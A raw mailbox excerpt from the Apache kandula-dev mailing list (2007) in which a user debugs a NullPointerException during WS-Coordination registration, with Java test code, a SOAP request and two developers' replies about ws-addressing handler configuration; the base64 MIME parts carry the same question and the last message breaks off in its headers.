PGh0dHA6Ly93cy5hcGFjaGUub3JnL2thbmR1bGElMjIlM0UxMjM0NTY3ODk5NjM1MjE0Nzg5JTND L25zMzpDYWxsYmFja1JlZiUzRSUzQy9uczI6UmVmZXJlbmNlUHJvcGVydGllcyUzRSUzQ25zNDpS ZWZlcmVuY2VQYXJhbWV0ZXJzPnhtbG5zOm5zND0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcv d3MvMjAwNC8wOC9hZGRyZXNzaW5nIi8+PC9QYXJ0aWNpcGFudFByb3RvY29sU2VydmljZT48L1Jl Z2lzdGVyPjwvc29hcGVudjpCb2R5Pjwvc29hcGVudjpFbnZlbG9wZTxodHRwOi8vc2NoZW1hcy54 bWxzb2FwLm9yZy93cy8yMDA0LzA4L2FkZHJlc3NpbmclMjIvJTNFJTNDL1BhcnRpY2lwYW50UHJv dG9jb2xTZXJ2aWNlJTNFJTNDL1JlZ2lzdGVyJTNFJTNDL3NvYXBlbnY6Qm9keSUzRSUzQy9zb2Fw ZW52OkVudmVsb3BlPgo+Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQogICAgRnJvbSB0aGUg c29hcCBjb250ZW50Lkkga25vdyBpZiBtYXliZSBiZWNhdXNlIHRoZSBzb2FwIGNvbnRlbnQgbGFj awpzb2FwaGVhZGVyIHdoaWNoIGluY2x1ZGUgdGhlIENBTExCQUNLX1JFRi5CdXQgSSBkb24ndCBr bm93IHdoaWNoIGNvbmZpZy1maWxlCm9yIHdoaWNoIHRoaW5ncyByZWxhdGUgd2l0aCB0aGUgQ2Fs bGJhY2tSZWdpc3RyeS5DQUxMQkFDS19SRUYuU28gSSBjYW4ndApzb2x2ZSB0aGUgcHJvYmxlbS5D YW4geW91IGhlbHAgbWUgPwogICBUaGFuayB5b3UgdmVyeSBtdWNoLgoKLS0gCiAgICAgICAgICAg ICAgIMjE1vHOsAqxsb6p08q157Tz0acgUENOJkNBRNbQ0MQK ------=_Part_68597_22431650.1185952546456 Content-Type: text/html; charset=GB2312 Content-Transfer-Encoding: base64 Content-Disposition: inline PGRpdj5IZWxsbzo8L2Rpdj4KPGRpdj4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgSSBt ZWV0IHNvbWUgcHJvYmxlbSB3aGVuIEkgdXNlIHRoZSBrYW5kdWxhLkluIGZhY3QsSSBqdXN0IHdh bnQgdG8gdGVzdCB0aGUgcmVnaXN0ZXIgb3BlcmF0aW9uLkJ1dCBpdCBhbHdheXMgdGhyb3cgamF2 YS5sYW5nLk51bGxQb2ludGVyRXhjZXB0aW9uLlRoZW4gSSBmb3VuZCB0aGUgbnVsbCBpbnN0YW5j ZSBpcyB0aGUgQ29vcmRpbmF0b3IgYyBpbiBjbGFzcyBSZWdpc3RyYXRpb25JbXBsLlRoZQogcmVh c29uIGlzJm5ic3A7Jm5ic3A7Jm5ic3A7Q29vcmRpbmF0b3IgYyA9IChDb29yZGluYXRvcilDYWxs YmFja1JlZ2lzdHJ5LmdldEluc3RhbmNlKCkuY29ycmVsYXRlTWVzc2FnZShDYWxsYmFja1JlZ2lz dHJ5LkNBTExCQUNLX1JFRiwgZmFsc2UpOyBkaWRuJiMzOTt0IGdldCB0aGUgTlVMTC5JIGRvbiYj Mzk7dCBrbm93IHdoZXJlIHNob3VsZCBtZSByZWxhdGUgQ2FsbGJhY2tSZWdpc3RyeS5DQUxMQkFD S19SRUYKIHdpdGggc29tZXRoaW5nLkhvdyBjYW4gSSBzb2x2ZSB0aGlzIHByb2JsZW0uPC9kaXY+ CjxkaXY+LS0tLS0tLS0tLS0tLS0tLS0tLS08L2Rpdj4KPGRpdj50aGUgdGVzdCBzb3VyY2UgaXMg OjwvZGl2Pgo8ZGl2Pgo8cD4mbmJzcDsmbmJzcDsmbmJzcDtmaW5hbCBDb29yZGluYXRpb25Db250 ZXh0IGN0eDs8YnI+Jm5ic3A7Jm5ic3A7Jm5ic3A7Y3R4ID0gbmV3IEFjdGl2YXRpb25TdHViKGFj dGl2YXRpb25TZXJ2aWNlRVBSKTxicj4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsuY3Jl YXRlQ29vcmRpbmF0aW9uQ29udGV4dChGQk9Db29yZGluYXRvci5DT09SRElOQVRJT05fVFlQRSk7 PGJyPiZuYnNwOyZuYnNwOyZuYnNwOy8vU3lzdGVtLm91dC5wcmludGxuKGN0eC5nZXRDb29yZGlu YXRpb25UeXBlKCkpOzxicj4mbmJzcDsmbmJzcDsmbmJzcDsvL1N5c3RlbS5vdXQucHJpbnRsbigg CmN0eC5nZXRJZGVudGlmaWVyKCkpOzxicj4mbmJzcDsmbmJzcDsmbmJzcDsvL1N5c3RlbS5vdXQu cHJpbnRsbihjdHguZ2V0UmVnaXN0cmF0aW9uU2VydmljZSgpKTs8YnI+Jm5ic3A7Jm5ic3A7Jm5i c3A7RW5kcG9pbnRSZWZlcmVuY2UgaW5pdGlhdG9yUG9ydCA9IENvb3JkaW5hdGlvblNlcnZpY2Uu Z2V0SW5zdGFuY2UoKTxicj4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsuZ2V0SW5pdGlh dG9yU2VydmljZShSZWdpc3RlSW5zdGFuY2UubmV3SW5zdGFuY2UoY3R4KSwgMCk7PGJyPgombmJz cDsmbmJzcDsmbmJzcDtTeXN0ZW0ub3V0LnByaW50bG4oJnF1b3Q7aW5pdGlhdG9yUG9ydDomcXVv dDsgKyBpbml0aWF0b3JQb3J0LnRvU3RyaW5nKCkpOzxicj4mbmJzcDsmbmJzcDsmbmJzcDsvLyBy ZW1vdGUgY29vcmRpbmF0aW9uIHNlcnZpY2VzIGVuZHBvaW50PGJyPiZuYnNwOyZuYnNwOyZuYnNw O1N0cmluZyBQUk9UT0NPTF9JRF9JTklUSUFUT1IgPSAmcXVvdDs8YSBvbmNsaWNrPSJyZXR1cm4g dG9wLmpzLk9wZW5FeHRMaW5rKHdpbmRvdyxldmVudCx0aGlzKSIgaHJlZj0iaHR0cDovL2JpZy50 dXdpZW4uYWMuYXQvd3MtZmJvLS1leHRlbnNpb25zL3Byb3RvY29sL2luaXRpYXRvciIgdGFyZ2V0 PSJfYmxhbmsiPgogaHR0cDovL2JpZy50dXdpZW4uYWMuYXQvd3MtZmJvLS1leHRlbnNpb25zL3By b3RvY29sL2luaXRpYXRvcjwvYT4mcXVvdDs7PGJyPiZuYnNwOyZuYnNwOyZuYnNwO0VuZHBvaW50 UmVmZXJlbmNlIGNvb3JkaW5hdG9yUG9ydCA9IGN0eC5yZWdpc3Rlcig8YnI+Jm5ic3A7Jm5ic3A7 Jm5ic3A7Jm5ic3A7Jm5ic3A7UFJPVE9DT0xfSURfSU5JVElBVE9SLCBpbml0aWF0b3JQb3J0KTs8 L3A+CjxwPiZuYnNwOyZuYnNwOyZuYnNwOy8vIENoZWNrIGlmIHdlIGdvdCBzb21ldGhpbmcgYmFj ay4uLjxicj4mbmJzcDsmbmJzcDsmbmJzcDtpZiAoY29vcmRpbmF0b3JQb3J0ID09IG51bGwpPGJy PiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO3Rocm93IG5ldyBOdWxsUG9pbnRlckV4Y2VwdGlvbig8 YnI+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7JnF1b3Q7Q29vcmRpbmF0b3JQ b3J0IGhhcyBub3QgYmVlbiBwcm92aWRlZCwgYnV0IGlzIHJlcXVpcmVkISZxdW90Oyk7PC9wPgo8 cD4mbmJzcDs8L3A+CjxwPi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSA8 L3A+CjxwPnRoZSByZWdpc3RyYXRpb25Db29yZGluYXRvciBzb2FwIGNvbnRlbnQgaXMgOjwvcD4K PHA+UE9TVCAvYXhpcy9zZXJ2aWNlcy9yZWdpc3RyYXRpb25Db29yZGluYXRvciBIVFRQLzEuMDxi cj5Db250ZW50LVR5cGU6IHRleHQveG1sOyBjaGFyc2V0PXV0Zi04PGJyPkFjY2VwdDogYXBwbGlj YXRpb24vc29hcCt4bWwsIGFwcGxpY2F0aW9uL2RpbWUsIG11bHRpcGFydC9yZWxhdGVkLCB0ZXh0 Lyo8YnI+VXNlci1BZ2VudDogQXhpcy8xLjQ8YnI+SG9zdDogPGEgb25jbGljaz0icmV0dXJuIHRv cC5qcy5PcGVuRXh0TGluayh3aW5kb3csZXZlbnQsdGhpcykiIGhyZWY9Imh0dHA6Ly8xMjcuMC4w LjE6ODI4MS8iIHRhcmdldD0iX2JsYW5rIj4KMTI3LjAuMC4xOjgyODE8L2E+PGJyPkNhY2hlLUNv bnRyb2w6IG5vLWNhY2hlPGJyPlByYWdtYTogbm8tY2FjaGU8YnI+U09BUEFjdGlvbjogJnF1b3Q7 PGEgb25jbGljaz0icmV0dXJuIHRvcC5qcy5PcGVuRXh0TGluayh3aW5kb3csZXZlbnQsdGhpcyki IGhyZWY9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDQvMTAvd3Njb29yL1JlZ2lz dGVyIiB0YXJnZXQ9Il9ibGFuayI+Cmh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDQv MTAvd3Njb29yL1JlZ2lzdGVyPC9hPiZxdW90Ozxicj5Db250ZW50LUxlbmd0aDogMTA5NSA8L3A+ CjxwPiZsdDs/eG1sIHZlcnNpb249JnF1b3Q7MS4wJnF1b3Q7IGVuY29kaW5nPSZxdW90O1VURi04 JnF1b3Q7PyZndDsmbHQ7c29hcGVudjpFbnZlbG9wZSB4bWxuczpzb2FwZW52PSZxdW90OzxhIG9u Y2xpY2s9InJldHVybiB0b3AuanMuT3BlbkV4dExpbmsod2luZG93LGV2ZW50LHRoaXMpIiBocmVm PSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyIgdGFyZ2V0PSJfYmxh bmsiPgpodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLzwvYT4mcXVvdDsg eG1sbnM6eHNkPSZxdW90OyA8YSBvbmNsaWNrPSJyZXR1cm4gdG9wLmpzLk9wZW5FeHRMaW5rKHdp bmRvdyxldmVudCx0aGlzKSIgaHJlZj0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEi IHRhcmdldD0iX2JsYW5rIj5odHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYTwvYT4mcXVv dDsgeG1sbnM6eHNpPSZxdW90Owo8YSBvbmNsaWNrPSJyZXR1cm4gdG9wLmpzLk9wZW5FeHRMaW5r KHdpbmRvdyxldmVudCx0aGlzKSIgaHJlZj0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hl bWEtaW5zdGFuY2UlMjIlM0UlM0Nzb2FwZW52OkJvZHklM0UlM0NSZWdpc3RlciIgdGFyZ2V0PSJf YmxhbmsiPmh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlJnF1b3Q7Jmd0 OyZsdDtzb2FwZW52OkJvZHkmZ3Q7Jmx0O1JlZ2lzdGVyIAo8L2E+eG1sbnM9JnF1b3Q7PGEgb25j bGljaz0icmV0dXJuIHRvcC5qcy5PcGVuRXh0TGluayh3aW5kb3csZXZlbnQsdGhpcykiIGhyZWY9 Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDQvMTAvd3Njb29yJTIyJTNFJTNDUHJv dG9jb2xJZGVudGlmaWVyJTNFaHR0cDovL2JpZy50dXdpZW4uYWMuYXQvd3MtZmJvLS1leHRlbnNp b25zL3Byb3RvY29sL2luaXRpYXRvciUzQy9Qcm90b2NvbElkZW50aWZpZXIlM0UlM0NQYXJ0aWNp cGFudFByb3RvY29sU2VydmljZSUzRSUzQ25zMTpBZGRyZXNzIiB0YXJnZXQ9Il9ibGFuayI+CiBo dHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA0LzEwL3dzY29vciZxdW90OyZndDsmbHQ7 UHJvdG9jb2xJZGVudGlmaWVyJmd0O2h0dHA6Ly9iaWcudHV3aWVuLmFjLmF0L3dzLWZiby0tZXh0 ZW5zaW9ucy9wcm90b2NvbC9pbml0aWF0b3ImbHQ7L1Byb3RvY29sSWRlbnRpZmllciZndDsmbHQ7 UGFydGljaXBhbnRQcm90b2NvbFNlcnZpY2UmZ3Q7Jmx0O25zMTpBZGRyZXNzPC9hPgogYWJzb2x1 dGVVUkk9JnF1b3Q7dHJ1ZSZxdW90OyBnZW5lcmljVVJJPSZxdW90O3RydWUmcXVvdDsgaG9zdD0m cXVvdDtsb2NhbGhvc3QmcXVvdDsgcGF0aD0mcXVvdDsvYXhpcy9zZXJ2aWNlcy9pbml0aWF0b3Im cXVvdDsgcG9ydD0mcXVvdDs4MjgxJnF1b3Q7IHNjaGVtZT0mcXVvdDtodHRwJnF1b3Q7IHNjaGVt ZVNwZWNpZmljUGFydD0mcXVvdDsvL2xvY2FsaG9zdDo4MjgxL2F4aXMvc2VydmljZXMvaW5pdGlh dG9yJnF1b3Q7IHhtbG5zOm5zMT0mcXVvdDsgCjxhIG9uY2xpY2s9InJldHVybiB0b3AuanMuT3Bl bkV4dExpbmsod2luZG93LGV2ZW50LHRoaXMpIiBocmVmPSJodHRwOi8vc2NoZW1hcy54bWxzb2Fw Lm9yZy93cy8yMDA0LzA4L2FkZHJlc3NpbmclMjIlM0VodHRwOi8vbG9jYWxob3N0OjgyODEvYXhp cy9zZXJ2aWNlcy9pbml0aWF0b3IlM0MvbnMxOkFkZHJlc3MlM0UlM0NuczI6UmVmZXJlbmNlUHJv cGVydGllcyIgdGFyZ2V0PSJfYmxhbmsiPgpodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8y MDA0LzA4L2FkZHJlc3NpbmcmcXVvdDsmZ3Q7aHR0cDovL2xvY2FsaG9zdDo4MjgxL2F4aXMvc2Vy dmljZXMvaW5pdGlhdG9yJmx0Oy9uczE6QWRkcmVzcyZndDsmbHQ7bnMyOlJlZmVyZW5jZVByb3Bl cnRpZXMgPC9hPnhtbG5zOm5zMj0mcXVvdDs8YSBvbmNsaWNrPSJyZXR1cm4gdG9wLmpzLk9wZW5F eHRMaW5rKHdpbmRvdyxldmVudCx0aGlzKSIgaHJlZj0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5v cmcvd3MvMjAwNC8wOC9hZGRyZXNzaW5nJTIyJTNFJTNDbnMzOkNhbGxiYWNrUmVmIiB0YXJnZXQ9 Il9ibGFuayI+Cmh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDQvMDgvYWRkcmVzc2lu ZyZxdW90OyZndDsmbHQ7bnMzOkNhbGxiYWNrUmVmPC9hPiB4bWxuczpuczM9JnF1b3Q7PGEgb25j bGljaz0icmV0dXJuIHRvcC5qcy5PcGVuRXh0TGluayh3aW5kb3csZXZlbnQsdGhpcykiIGhyZWY9 Imh0dHA6Ly93cy5hcGFjaGUub3JnL2thbmR1bGElMjIlM0UxMjM0NTY3ODk5NjM1MjE0Nzg5JTND L25zMzpDYWxsYmFja1JlZiUzRSUzQy9uczI6UmVmZXJlbmNlUHJvcGVydGllcyUzRSUzQ25zNDpS ZWZlcmVuY2VQYXJhbWV0ZXJzIiB0YXJnZXQ9Il9ibGFuayI+CiBodHRwOi8vd3MuYXBhY2hlLm9y Zy9rYW5kdWxhJnF1b3Q7Jmd0OzEyMzQ1Njc4OTk2MzUyMTQ3ODkmbHQ7L25zMzpDYWxsYmFja1Jl ZiZndDsmbHQ7L25zMjpSZWZlcmVuY2VQcm9wZXJ0aWVzJmd0OyZsdDtuczQ6UmVmZXJlbmNlUGFy YW1ldGVyczwvYT4geG1sbnM6bnM0PSZxdW90OzxhIG9uY2xpY2s9InJldHVybiB0b3AuanMuT3Bl bkV4dExpbmsod2luZG93LGV2ZW50LHRoaXMpIiBocmVmPSJodHRwOi8vc2NoZW1hcy54bWxzb2Fw Lm9yZy93cy8yMDA0LzA4L2FkZHJlc3NpbmclMjIvJTNFJTNDL1BhcnRpY2lwYW50UHJvdG9jb2xT ZXJ2aWNlJTNFJTNDL1JlZ2lzdGVyJTNFJTNDL3NvYXBlbnY6Qm9keSUzRSUzQy9zb2FwZW52OkVu dmVsb3BlIiB0YXJnZXQ9Il9ibGFuayI+CiBodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8y MDA0LzA4L2FkZHJlc3NpbmcmcXVvdDsvJmd0OyZsdDsvUGFydGljaXBhbnRQcm90b2NvbFNlcnZp Y2UmZ3Q7Jmx0Oy9SZWdpc3RlciZndDsmbHQ7L3NvYXBlbnY6Qm9keSZndDsmbHQ7L3NvYXBlbnY6 RW52ZWxvcGU8L2E+Jmd0OzwvcD48L2Rpdj4KPGRpdj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS08L2Rpdj4KPGRpdj4mbmJzcDsmbmJzcDsmbmJzcDsgRnJvbSB0aGUgc29hcCBjb250ZW50Lkkg a25vdyBpZiBtYXliZSBiZWNhdXNlIHRoZSBzb2FwIGNvbnRlbnQgbGFjayBzb2FwaGVhZGVyIHdo aWNoIGluY2x1ZGUgdGhlIENBTExCQUNLX1JFRi5CdXQgSSZuYnNwO2RvbiYjMzk7dCBrbm93IHdo aWNoIGNvbmZpZy1maWxlIG9yIHdoaWNoIHRoaW5ncyByZWxhdGUgd2l0aCB0aGUgQ2FsbGJhY2tS ZWdpc3RyeS5DQUxMQkFDS19SRUYuU28KIEkgY2FuJiMzOTt0IHNvbHZlIHRoZSBwcm9ibGVtLkNh biB5b3UgaGVscCBtZSA/PC9kaXY+CjxkaXY+Jm5ic3A7Jm5ic3A7IFRoYW5rIHlvdSB2ZXJ5IG11 Y2guPGJyIGNsZWFyPSJhbGwiPjxicj4tLSA8YnI+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7 IMjE1vHOsDxicj6xsb6p08q157Tz0acgUENOJmFtcDtDQUTW0NDEIDwvZGl2Pgo= ------=_Part_68597_22431650.1185952546456-- From [email protected] Wed Aug 01 14:00:10 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 3302 invoked from network); 1 Aug 2007 14:00:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Aug 2007 14:00:08 -0000 Received: (qmail 47571 invoked by uid 500); 1 Aug 2007 14:00:07 -0000 Delivered-To: [email protected] Received: (qmail 47520 invoked by uid 500); 1 Aug 2007 14:00:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <kandula-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 47509 invoked by uid 99); 1 Aug 2007 14:00:06 -0000 Received: from Unknown (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Aug 2007 07:00:06 -0700 X-ASF-Spam-Status: No, hits=1.5 required=10.0 tests=SPF_PASS,WEIRD_PORT X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mailhub128.itcs.purdue.edu) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Aug 2007 13:59:52 +0000 Received: from mailhub198.itcs.purdue.edu (mailhub198.itcs.purdue.edu [161.129.204.104]) by mailhub128.itcs.purdue.edu (8.13.7/8.13.7/smtp.purdue.edu) with ESMTP id l71Dxa3O028679 for <[email protected]>; Wed, 1 Aug 2007 09:59:36 -0400 Received: from mailhub198.itcs.purdue.edu (localhost.localdomain [161.129.204.104]) by mailhub198.itcs.purdue.edu (161.129.204.10460308/8.12.11/webmail-test) with ESMTP id l71Dxaqv030648 for <[email protected]>; Wed, 1 Aug 2007 09:59:36 -0400 Received: (from apache@localhost) by mailhub198.itcs.purdue.edu (161.129.204.10460308/8.12.11/Submit) id l71DxZ84030644 for [email protected]; Wed, 1 Aug 2007 09:59:35 -0400 X-Authentication-Warning: mailhub198.itcs.purdue.edu: apache set sender to [email protected] using -f Received: from sagamoreridge.wintek.com (sagamoreridge.wintek.com [161.129.204.104]) by webmail.purdue.edu (IMP) with HTTP for <[email protected]>; Wed, 1 Aug 2007 09:59:35 -0400 Message-ID: <[email protected]> Date: Wed, 1 Aug 2007 09:59:35 -0400 From: Dasarath Weeratunge <[email protected]> To: [email protected] Subject: Re: problem about kandula References: <[email protected]> In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.2-cvs X-PMX-Version: 161.129.204.1049297 X-PerlMx-Virus-Scanned: Yes X-Virus-Checked: Checked by ClamAV on apache.org Quoting ÖñΰÈÄ <[email protected]>: > <?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv=" > http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd=" > http://www.w3.org/2001/XMLSchema" > xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><Register It could be that your ws-addressing handler (on the client side) is not properly configured and thus references properties are not getting added in to your Register message when it is sent to the coordinator. Reference properties in the Register message are typically used by the Coordination Service to look up the relevant coordinator object from the Callback Registry. You seem to be using ws-ba so I cannot give you a definitive answer. Kandula-1 docs provide information on HOW-TO configure ws-addressing handler using (client|server)-config.wsdd. thanks, --dasarath > Hello: > I meet some problem when I use the kandula.In fact,I just want to test > the register operation.But it always throw > java.lang.NullPointerException.Then I found the null instance is the > Coordinator c in class RegistrationImpl.The reason is Coordinator c = > (Coordinator)CallbackRegistry.getInstance().correlateMessage( > CallbackRegistry.CALLBACK_REF, false); didn't get the NULL.I don't know > where should me relate CallbackRegistry.CALLBACK_REF with something.How can > I solve this problem. > -------------------- > the test source is : > > final CoordinationContext ctx; > ctx = new ActivationStub(activationServiceEPR) > .createCoordinationContext(FBOCoordinator.COORDINATION_TYPE); > //System.out.println(ctx.getCoordinationType()); > //System.out.println( ctx.getIdentifier()); > //System.out.println(ctx.getRegistrationService()); > EndpointReference initiatorPort = CoordinationService.getInstance() > .getInitiatorService(RegisteInstance.newInstance(ctx), 0); > System.out.println("initiatorPort:" + initiatorPort.toString()); > // remote coordination services endpoint > String PROTOCOL_ID_INITIATOR = > "http://big.tuwien.ac.at/ws-fbo--extensions/protocol/initiator > "; > EndpointReference coordinatorPort = ctx.register( > PROTOCOL_ID_INITIATOR, initiatorPort); > > // Check if we got something back... > if (coordinatorPort == null) > throw new NullPointerException( > "CoordinatorPort has not been provided, but is required!"); > > > > --------------------------------------- > > the registrationCoordinator soap content is : > > POST /axis/services/registrationCoordinator HTTP/1.0 > Content-Type: text/xml; charset=utf-8 > Accept: application/soap+xml, application/dime, multipart/related, text/* > User-Agent: Axis/1.4 > Host: 161.129.204.104:8281 > Cache-Control: no-cache > Pragma: no-cache > SOAPAction: "http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register" > Content-Length: 1095 > > <?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv=" > http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd=" > http://www.w3.org/2001/XMLSchema" > xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><Register > <http://www.w3.org/2001/XMLSchema-instance%22%3E%3Csoapenv:Body%3E%3CRegister> > xmlns="http://schemas.xmlsoap.org/ws/2004/10/wscoor"><ProtocolIdentifier>http://big.tuwien.ac.at/ws-fbo--extensions/protocol/initiator</ProtocolIdentifier><ParticipantProtocolService><ns1:Address<http://schemas.xmlsoap.org/ws/2004/10/wscoor%22%3E%3CProtocolIdentifier%3Ehttp://big.tuwien.ac.at/ws-fbo--extensions/protocol/initiator%3C/ProtocolIdentifier%3E%3CParticipantProtocolService%3E%3Cns1:Address>absoluteURI="true" > genericURI="true" host="localhost" > path="/axis/services/initiator" port="8281" scheme="http" > schemeSpecificPart="//localhost:8281/axis/services/initiator" > xmlns:ns1=" > http://schemas.xmlsoap.org/ws/2004/08/addressing">http://localhost:8281/axis/services/initiator</ns1:Address><ns2:ReferenceProperties > <http://schemas.xmlsoap.org/ws/2004/08/addressing%22%3Ehttp://localhost:8281/axis/services/initiator%3C/ns1:Address%3E%3Cns2:ReferenceProperties> > xmlns:ns2=" > http://schemas.xmlsoap.org/ws/2004/08/addressing"><ns3:CallbackRef<http://schemas.xmlsoap.org/ws/2004/08/addressing%22%3E%3Cns3:CallbackRef>xmlns:ns3="http://ws.apache.org/kandula">1234567899635214789</ns3:CallbackRef></ns2:ReferenceProperties><ns4:ReferenceParameters<http://ws.apache.org/kandula%22%3E1234567899635214789%3C/ns3:CallbackRef%3E%3C/ns2:ReferenceProperties%3E%3Cns4:ReferenceParameters>xmlns:ns4="http://schemas.xmlsoap.org/ws/2004/08/addressing"/></ParticipantProtocolService></Register></soapenv:Body></soapenv:Envelope<http://schemas.xmlsoap.org/ws/2004/08/addressing%22/%3E%3C/ParticipantProtocolService%3E%3C/Register%3E%3C/soapenv:Body%3E%3C/soapenv:Envelope> > > > --------------------------- > From the soap content.I know if maybe because the soap content lack > soapheader which include the CALLBACK_REF.But I don't know which config-file > or which things relate with the CallbackRegistry.CALLBACK_REF.So I can't > solve the problem.Can you help me ? > Thank you very much. > > -- > ÈÄÖñΰ > ±±¾©Óʵç´óѧ PCN&CADÖÐÐÄ > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Aug 01 15:39:01 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 7693 invoked from network); 1 Aug 2007 15:38:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Aug 2007 15:38:49 -0000 Received: (qmail 54393 invoked by uid 500); 1 Aug 2007 15:38:48 -0000 Delivered-To: [email protected] Received: (qmail 54363 invoked by uid 500); 1 Aug 2007 15:38:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <kandula-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 54352 invoked by uid 99); 1 Aug 2007 15:38:48 -0000 Received: from Unknown (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Aug 2007 08:38:48 -0700 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mx.inode.at) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Aug 2007 15:38:36 +0000 Received: from [161.129.204.104] (port=13871 helo=margarita.erven.at) by smartmx-15.inode.at with esmtps (TLS-1.0:DHE_RSA_AES_256_CBC_SHA:32) (Exim 4.50) id 1IGGH8-0001nQ-9a; Wed, 01 Aug 2007 17:38:16 +0200 Received: from [161.129.204.104] (localhost [161.129.204.104]) by margarita.erven.at (Postfix) with ESMTP id E4B1F2129B4; Wed, 1 Aug 2007 17:38:11 +0200 (CEST) Message-ID: <[email protected]> Date: Wed, 01 Aug 2007 17:38:16 +0200 From: Hannes Erven <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20070604) MIME-Version: 1.0 To: [email protected] CC: =?GB2312?B?1vHOsMjE?= <[email protected]> Subject: Re: problem about kandula References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=GB2312 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Hi =D6=F1=CE=B0=C8=C4, can you please explain to us what you are trying to do? Depending on what application type you develop the answers might differ. I know that the WSBA sample is not yet very well documented as an introduction into Kandula, but this will follow. In short, all you should need to do is: coordIProxy =3D AtomicCoordinatorIProxy.createNewContext_WithWSBAI(); or coordIProxy =3D MixedCoordinatorIProxy.createNewContext_WithWSBAI(); This will activate the WSBA context and register the coordinator instance for you. In what line of your source is the nullpointer exception thrown? I'm asking because in the source you check for coordinatorPort being null without having the variable declared or assigned. Your source seems to take on the initiator as well as the participant roles, so I'm a bit confused what you are trying to do. Best regards, -hannes --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Aug 02 20:05:40 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81186 invoked from network); 2 Aug 2007 20:05:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Aug 2007 20:05:37 -0000 Received: (qmail 60921 invoked by uid 500); 2 Aug 2007 20:05:36 -0000 Delivered-To: [email protected] Received: (qmail 60870 invoked by uid 500); 2 Aug 2007 20:05:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <kandula-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 60859 invoked by uid 99); 2 Aug 2007 20:05:36 -0000 Received: from athena.apache.org (HELO athena.apache.org) 